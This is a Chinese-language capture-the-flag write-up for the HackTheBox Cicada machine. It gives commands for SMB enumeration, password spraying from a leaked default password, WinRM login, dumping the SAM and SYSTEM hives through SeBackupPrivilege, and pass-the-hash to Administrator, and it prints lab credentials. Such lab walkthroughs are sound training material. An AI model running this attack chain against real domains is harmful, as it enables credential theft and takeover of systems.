[HackTheBox] Cicada Writeup

0 阅读4分钟

靶机概览

目标地址:

10.10.11.35

端口扫描

先进行 UDP 扫描

nmap -sU --min-rate 10000 10.10.11.35

UDP 扫描没有发现太多可直接利用的信息,但可以记录下 389 端口。接着进行 TCP 全端口扫描:

nmap -sT -p- --min-rate 10000 10.10.11.35

扫描结果显示开放了多个典型 Windows 域环境端口,包括 53、88、135、139、389、445、464、593、636、3268、3269、5985 等。其中 445 表示 SMB 可访问,5985 表示 WinRM 服务开放。

为了整理可用端口,可以从扫描结果中提取开放端口:

grep open ports | awk -F/ '{print $1}' | paste -sd ,

可以对开放端口跑一次 NSE 漏洞脚本

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,60304 10.10.11.35

这里没有直接可用的漏洞,但先前发现开放了 445 端口,重点转向 SMB 枚举。

SMB 匿名访问与 HR 共享枚举

先检查 SMB 是否允许匿名访问

smbclient -N -L 10.10.11.35

结果中可以看到 HR 共享目录可访问。继续枚举 SMB 信息

enum4linux -a -u guest 10.10.11.35

结果中可以看到 HR 共享目录可访问。继续枚举 SMB 信息:

enum4linux -a -u guest 10.10.11.35

在 HR 共享中发现了新员工通知文件,内容:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,  
Cicada Corp

这泄露了一串默认密码,Your default password is: Cicada$M6Corpb*@Lp#nZp!8。下一步需要枚举域用户并测试哪些账号可能仍在使用该密码。

域用户枚举与凭据验证

通过 RID Brute 枚举用户

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute

枚举到的用户包括:

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

将用户列表和默认密码组合验证

crackmapexec smb 10.10.11.35 -u user -p pass --continue-on-success

验证结果显示 michael.wrightson 可以使用该默认密码登录。接下来检查该账号对共享目录的访问权限。

DEV 共享与二次凭据发现

使用 michael.wrightson 查看共享目录后,可以看到新的 DEV 共享,但该账号没有读取权限。同时该账号也无法直接通过 WinRM 获取 shell。

继续进行凭据验证

crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares

发现 david.orelious 拥有可用密码,该账号可以访问 DEV 共享。进入共享目录并下载可疑文件

打开文件后发现了新的账号密码信息,指向 Windows 域用户 emily.oscars

WinRM(Windows Remote Management)是 WS-Management 协议的 Microsoft 实现,该协议是基于 SOAP 的标准简单对象访问协议的防火墙友好协议,允许不同供应商的硬件和操作系统之间进行互操作。

WinRM 初始访问

由于 5985 端口开放,可以使用 evil-winrm 尝试远程登录:

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p '<password>'

登录成功后获得初始 shell,可以读取用户目录下的 user flag。

SeBackupPrivilege 权限分析

拿到 shell 后,先查看当前用户权限:

whoami /priv

可以看到当前用户具备 SeBackupPrivilege。SeBackupPrivilege 是 Windows 操作系统中的一个特权,这个权限允许用户以备份方式读取受 ACL 保护的文件。在 Windows 提权场景中,它通常可以用于导出 SAMSYSTEM 注册表配置单元,随后离线提取本地账户 Hash。

SeBackupPrivilege利用思路是

备份 `HKLM\SAM`
备份 `HKLM\SYSTEM`
下载到本地
使用 `impacket-secretsdump` 提取 NTLM Hash
使用本地管理员 Hash 登录

根据思路继续尝试

导出 SAM/SYSTEM 并提取 Hash

在 WinRM shell 中导出注册表文件

reg save hklm\sam C:\Users\emily.oscars.CICADA\Desktop\sam
reg save hklm\system C:\Users\emily.oscars.CICADA\Desktop\system

通过 evil-winrm 下载文件

download sam
download system

在本地使用 impacket-secretsdump 提取 Hash

impacket-secretsdump -sam sam -system system local

拿到本地管理员 NTLM Hash 后,可以使用 Pass-the-Hash 登录目标机器。

使用 Hash 登录并读取 Root Flag

使用管理员 Hash 登录。

evil-winrm -i 10.10.11.35 -u Administrator -H '<administrator_ntlm_hash>'

登录后进入管理员桌面目录,读取 root flag 即可。


参考


免责声明
本文章所涉及仅供技术研究和学习之用。所有操作仅在合法授权的环境中进行,绝不用于任何非法活动。作者对因本文章内容导致的任何后果不承担责任。请读者务必遵守相关法律法规,合理使用本知识。


如果你对本文内容感兴趣,欢迎关注我的公众号 “Sh1n Sec”,获取更多网络安全、漏洞分析等相关内容。如对于文章中的技术细节有疑问、附件有需要,欢迎私信我,我会尽量帮助解答。期待与您的交流!